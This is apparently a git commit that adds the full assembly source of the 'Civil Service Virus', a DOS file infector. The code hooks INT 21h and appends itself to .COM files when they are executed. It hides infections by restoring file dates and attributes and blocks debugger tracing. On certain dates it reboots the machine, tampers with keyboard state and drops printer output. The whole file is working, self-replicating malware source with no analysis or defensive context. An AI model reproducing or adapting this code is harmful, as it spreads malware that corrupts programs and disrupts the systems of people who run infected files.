Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 17:34:47 -06:00
parent d3381d8e02
commit 99a7802ac0
99 changed files with 50186 additions and 0 deletions
@@ -0,0 +1,569 @@
+; Civil Service Virus by Marvin Giskard
+; Turbo Assember version 2
+
+Exec        equ  4B00h
+OpenFile    equ  3D02h
+ReadFile    equ  3Fh
+WriteFile   equ  40h
+CloseFile   equ  3Eh
+EXESign     equ  5A4Dh
+SeekTop     equ  4200h
+SeekEnd     equ  4202h
+GetAttr     equ  4300h
+SetAttr     equ  4301h
+GetDT       equ  5700h
+SetDT       equ  5701h
+MinSize     equ  4h
+MaxSize     equ  0FBF0h
+GetDate     equ  2Bh
+FileID      equ  2206h
+MemID       equ  4246h     ;     'FB'
+
+.MODEL SMALL
+.CODE
+ORG 0100h
+
+Start:
+  XOR AX, AX
+  MOV DS, AX
+  CMP WORD PTR DS:01ACh, MemID
+  JNE Instl2
+  CMP WORD PTR DS:01AEh, FileID
+  JE NoInstl2
+
+Instl2:
+  CALL InstallInMem
+
+NoInstl2:
+  PUSH CS
+  PUSH CS
+  POP DS
+  POP ES
+  MOV DX, OFFSET FileName
+  MOV AX, 4B22h
+  INT 21h
+  INT 20h
+
+FileName: DB 'TEST.COM',0
+
+AddCode:
+  JMP OverData
+
+  ; Addcode's data
+
+Buf:          DB 0, 0                   ; Miscellaneous Buf
+JumpCode:     DB 0E9h, 00h, 00h         ; Code to be placed at front of file
+FSize:        DW 0                      ; File size
+Attr:         DB 0                      ; Attr of file being infected
+FDateTime:    DD 0                      ; Time and date of file being infected
+Generation:   DW 0                      ; Generation counter
+Infected:     DW 0                      ; Number of files infected
+Old24Handler: DD 0                      ; Old INT 24h handler
+Acts:         DB 0                      ; Flag to stop reentry
+Path:         DD 0
+
+OverData:
+  MOV WORD PTR DS:0100h, 0000h
+  MOV BYTE PTR DS:0102h, 00h
+
+  ; Check if handler already installed by examining 2 words in vector
+  ; table entry of INT 6Bh
+
+  XOR AX, AX
+  MOV DS, AX
+  CMP WORD PTR DS:01ACh, MemID
+  JNE Instl
+  CMP WORD PTR DS:01AEh, FileID
+  JE AlreadyInstalled
+
+Instl:
+  CALL InstallInMem
+  JMP ALreadyInstalled
+
+InstallInMem:
+  MOV WORD PTR DS:01ACh, MemID
+  MOV WORD PTR DS:01AEh, FileID
+
+  PUSH CS
+  POP DS
+
+  ; Get INT 21h handler in ES:BX.
+
+  MOV AX, 3521h
+  INT 21h
+DoOldOfs:
+  MOV SI, OFFSET DoOld+1
+  MOV [SI], BX
+  MOV [SI+2], ES
+  PUSH ES
+  PUSH BX
+  POP DX
+  POP DS
+  MOV AX, 256Dh
+  INT 21h
+
+  ; This label is here so that the infect part will be able to calculate
+  ; source offset of Int21Handler and then place it in here before writing
+  ; it to disk. The OFFSET AddCode will be replaced by the right number.
+
+Source:
+  MOV SI, OFFSET AddCode
+
+  ; Destination e.g. Where program will be placed are now calculated by
+  ; taking the amount of memory in $0040:$0013. Multiply by 16 to get
+  ; segment of memory end and then subract amount of blocks needed.
+  ; This is where routine will be placed.
+
+  MOV AX, 0040h
+  MOV DS, AX
+  MOV AX, WORD PTR DS:0013h
+  MOV CL, 6
+  SHL AX, CL
+
+  ; Set dest. segment 2048 pages (32 K) below top of memory.
+
+  SUB AX, 2048
+  MOV ES, AX
+  XOR DI, DI
+  MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
+  PUSH CS
+  POP DS
+  REP MOVSB
+
+  ; Set INT 21h Handler to point to our routine
+
+  MOV AX, 2521h
+  PUSH ES
+  POP DS
+  MOV DX, OFFSET Int21Handler - OFFSET AddCode
+  INT 21h
+
+  MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0
+
+  RET
+
+AlreadyInstalled:
+
+  Call DisTrace
+
+  ; Code to jump back to 0100h
+
+  PUSH CS
+  PUSH CS
+  POP DS
+  POP ES
+  MOV AX, 0100h
+  JMP AX
+
+  ; Disable tracing and breakpoint setting for debuggers.
+
+DisTrace:
+  MOV AX, 0F000h
+  MOV DS, AX
+  MOV DX, 0FFF0h
+  MOV AX, 2501h
+  INT 21h
+  MOV AX, 2503h
+  INT 21h
+  RET
+
+Int21Handler:
+  PUSH AX
+  PUSH BX
+  PUSH CX
+  PUSH DX
+  PUSH DI
+  PUSH SI
+  PUSH ES
+  PUSH DS
+
+  ; Install devious act if seed is right
+
+  MOV AH, 2Ah
+  INT 6Dh
+  CMP CX, 1991
+  JB Act
+  CMP DL, 22
+  JNE Timer
+  DB 0EAh, 0F0h, 0FFh, 00h, 0F0h
+
+Timer:
+  MOV AH, 25h
+  CMP DL, 29
+  JE Inst1
+  CMP DL, 1
+  JE Inst2
+  CMP DL, 10
+  JE Inst3
+  CMP DL, 16
+  JE Inst4
+  JMP Act
+Inst1:
+  MOV AL, 13h
+  JMP SetVec
+Inst2:
+  MOV AL, 16h
+  JMP SetVec
+Inst3:
+  MOV AL, 0Dh
+  JMP SetVec
+Inst4:
+  MOV AL, 10h
+
+SetVec:
+  PUSH CS
+  POP DS
+  MOV DX, OFFSET Int24Handler - OFFSET AddCode
+  INT 6Dh
+
+Act:
+  MOV AX, 0040h
+  MOV DS, AX
+  MOV AX, WORD PTR DS:006Eh
+
+  PUSH CS
+  POP DS
+  MOV BH, DS:[OFFSET Acts - OFFSET AddCode]
+  CMP BH, 3
+  JE NoAct
+
+  CMP AX, 22
+  JE NoAct
+
+  MOV BYTE PTR [SI], 3
+  MOV AX, 3509h
+  INT 21h
+  PUSH ES
+  PUSH BX
+  POP DX
+  POP DS
+  MOV AX, 256Ah
+  INT 21h
+  PUSH CS
+  POP DS
+  MOV DX, OFFSET Int9Handler - OFFSET AddCode
+  MOV AX, 2509h
+  INT 21h
+
+  MOV AX, 3517h
+  INT 21h
+  PUSH ES
+  PUSH BX
+  POP DX
+  POP DS
+  MOV AX, 256Ch
+  INT 21h
+  PUSH CS
+  POP DS
+  MOV DX, OFFSET Int17Handler - OFFSET AddCode
+  MOV AX, 2517h
+  INT 21h
+
+NoAct:
+
+  POP DS
+  POP ES
+  POP SI
+  POP DI
+  POP DX
+  POP CX
+  POP BX
+  POP AX
+
+  CMP AH, 4Bh
+  JE Infect
+DoOld:
+  ;  This next bytes represent a JMP 0000h:0000h. The 0's will be replaced
+  ;  by the address of the old 21 handler.
+  DB 0EAh
+  DD 0
+
+DoOldPop:
+  POP ES
+  POP DS
+  POP BP
+  POP DI
+  POP SI
+  POP DX
+  POP CX
+  POP BX
+  POP AX
+  JMP DoOld
+
+CloseQuit:
+
+  MOV AX, 2524h
+  MOV SI, OFFSET Old24Handler-OFFSET AddCode
+  MOV DX, CS:[SI]
+  MOV DS, CS:[SI+2]
+  INT 21h
+
+  PUSH CS
+  POP DS
+  MOV SI, OFFSET FDateTime-OFFSET AddCode
+  MOV CX, DS:[SI]
+  MOV DX, DS:[SI+2]
+  MOV AX, SetDT
+  INT 21h
+
+  MOV AH, CloseFile
+  INT 21h
+
+  MOV AX, SetAttr
+  MOV CL, DS:[OFFSET Attr - OFFSET AddCode]
+  XOR CH, CH
+  MOV SI, OFFSET Path-OFFSET AddCode
+  MOV DX, DS:[SI]
+  MOV DS, DS:[SI+2]
+
+  INT 21h
+
+  JMP DoOldPop
+
+Infect:
+  PUSH AX
+  PUSH BX
+  PUSH CX
+  PUSH DX
+  PUSH SI
+  PUSH DI
+  PUSH BP
+  PUSH DS
+  PUSH ES
+
+  ; Get file's attr
+
+  MOV AX, GetAttr
+  INT 21h
+  JC CloseQuit
+  MOV CS:[OFFSET Attr-OFFSET AddCode], CL
+
+  MOV SI, OFFSET Path-OFFSET AddCode
+  MOV CS:[SI], DX
+  MOV CS:[SI+2], DS
+
+  ; Get/Set INT 24h handler
+
+  MOV AX, 3524h
+  INT 21h
+  MOV SI, OFFSET Old24Handler-OFFSET AddCode
+  MOV CS:[SI], BX
+  MOV CS:[SI+2], ES
+  MOV AX, 2524h
+  PUSH CS
+  POP DS
+  MOV DX, OFFSET Int24Handler-OFFSET AddCode
+  INT 21h
+
+  ; Set new attribute
+
+  MOV SI, OFFSET Path-OFFSET AddCode
+  MOV DX, CS:[SI]
+  MOV DS, CS:[SI+2]
+
+  MOV AX, SetAttr
+  MOV CX, 0020h
+  INT 21h
+  JC CloseQuitFoot
+
+  MOV AX, OpenFile
+  INT 21h
+  JC CloseQuitFoot
+  MOV BX, AX
+
+  ; Get file's time and date and store
+
+  MOV AX, GetDT
+  INT 21h
+  JC CloseQuitFoot
+  PUSH CS
+  POP DS
+  MOV SI, OFFSET FDateTime-OFFSET AddCode
+  MOV DS:[SI], CX
+  MOV DS:[SI+2], DX
+
+  ; Read first two bytes of file
+
+  MOV AH, ReadFile
+  MOV CX, 2
+  MOV DX, OFFSET OverData+4-OFFSET AddCode
+  INT 21h
+  JC CloseQuitFoot
+
+  ; Check if fisrt two bytes identify the file as an EXE file
+  ; If so, then don't infect the file
+
+  CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign
+  JE CloseQuitFoot
+
+  ; Read next byte
+
+  MOV AH, ReadFile
+  MOV CX, 1
+  MOV DX, OFFSET OverData+10-OFFSET AddCode
+  INT 21h
+  JC CloseQuitFoot
+
+  ; Get file size
+
+  MOV AX, SeekEnd
+  XOR CX, CX
+  XOR DX, DX
+  INT 21h
+  JC CloseQuitFoot
+
+  ; Save filesize and calculate jump offset
+
+  CMP DX, 0
+  JG CloseQuitFoot
+  CMP AX, MinSize
+  JB CloseQuitFoot
+  CMP AX, MaxSize
+  JA CloseQuitFoot
+  MOV DS:[OFFSET FSize-OFFSET AddCode], AX
+  MOV CX, AX
+  SUB AX, 03h
+  MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX
+
+  ; Calculate and store source
+
+  ADD CX, 0100h
+  MOV [OFFSET Source+1-OFFSET AddCode], CX
+
+  ADD CX, OFFSET DoOld-OFFSET AddCode
+  MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX
+
+  JMP OverFoot1
+
+CloseQuitFoot:
+  JMP CloseQuit
+
+OverFoot1:
+  ; Read last 2 bytes to see if it is already infected
+
+  MOV AX, SeekTop
+  XOR CX, CX
+  MOV DX, [OFFSET FSize-OFFSET AddCode]
+  SUB DX, 2
+  INT 21h
+
+  MOV AH, ReadFile
+  MOV CX, 2
+  MOV DX, OFFSET Buf-OFFSET AddCode
+  INT 21h
+
+  CMP [OFFSET Buf-OFFSET AddCode], FileID
+  JE CloseQuitFoot
+
+  ; Prepare to write new jump
+
+  MOV AX, SeekTop
+  XOR CX, CX
+  XOR DX, DX
+  INT 21h
+
+  ; Write new jump
+
+  MOV AH, WriteFile
+  MOV CX, 3
+  MOV DX, OFFSET JumpCode-OFFSET AddCode
+  INT 21h
+
+  ; Write addcode
+  ; Code to restore first three bytes is at start of addcode
+  ; Int21 handler is also included
+  ; Generation counter is included in data
+  ; ID is at the end of addcode
+
+  MOV AX, SeekEnd
+  XOR CX, CX
+  XOR DX, DX
+  INT 21h
+
+  ; Increase generation counter before writing it to the new file
+
+  INC WORD PTR [OFFSET Generation - OFFSET AddCode]
+
+  ; Set files infected to 0, for child hasn't infected anyone.
+
+  MOV SI, OFFSET Infected - OFFSET AddCode
+  PUSH WORD PTR [SI]
+  MOV WORD PTR [SI], 0
+
+  MOV AH, WriteFile
+  MOV DX, OFFSET AddCode - OFFSET AddCode      ; 0000
+  MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
+  INT 21h
+
+  ; Decrease counter again, cause all his children should have the same
+  ; generation count
+
+  DEC WORD PTR [OFFSET Generation - OFFSET AddCode]
+
+  ; Pop number of files infected and incread
+
+  POP AX
+  INC AX
+  MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX
+
+  JMP CloseQuit
+
+Int24Handler:
+  XOR AL, AL
+  IRET
+
+Int9Handler:
+  PUSH AX
+  PUSH CX
+  PUSH DS
+
+  MOV AX, 0040h
+  MOV DS, AX
+  MOV AH, BYTE PTR DS:006Ch
+  CMP AH, 18
+  JA NoChange
+  MOV CL, 4
+  SHL AH, CL
+  SHR AH, CL
+  MOV BYTE PTR DS:0017h, AH
+
+NoChange:
+  POP DS
+  POP CX
+  POP AX
+  INT 6Ah
+  IRET
+
+Int17Handler:
+  CMP AH, 00h
+  JNE DoOld17
+  PUSH DS
+  PUSH AX
+  PUSH BX
+  MOV BX, 0040h
+  MOV DS, BX
+  MOV BH, BYTE PTR DS:006Ch
+  SHR BH, 1
+  SHR BH, 1
+  CMP BH, 22h
+  JE Ignore17
+  POP BX
+  POP AX
+  POP DS
+
+DoOld17:
+  INT 6Ch
+  IRET
+
+Ignore17:
+  POP BX
+  POP AX
+  POP DS
+  IRET
+
+  DW FileID
+
+AddCodeEnd:
+
+END Start
+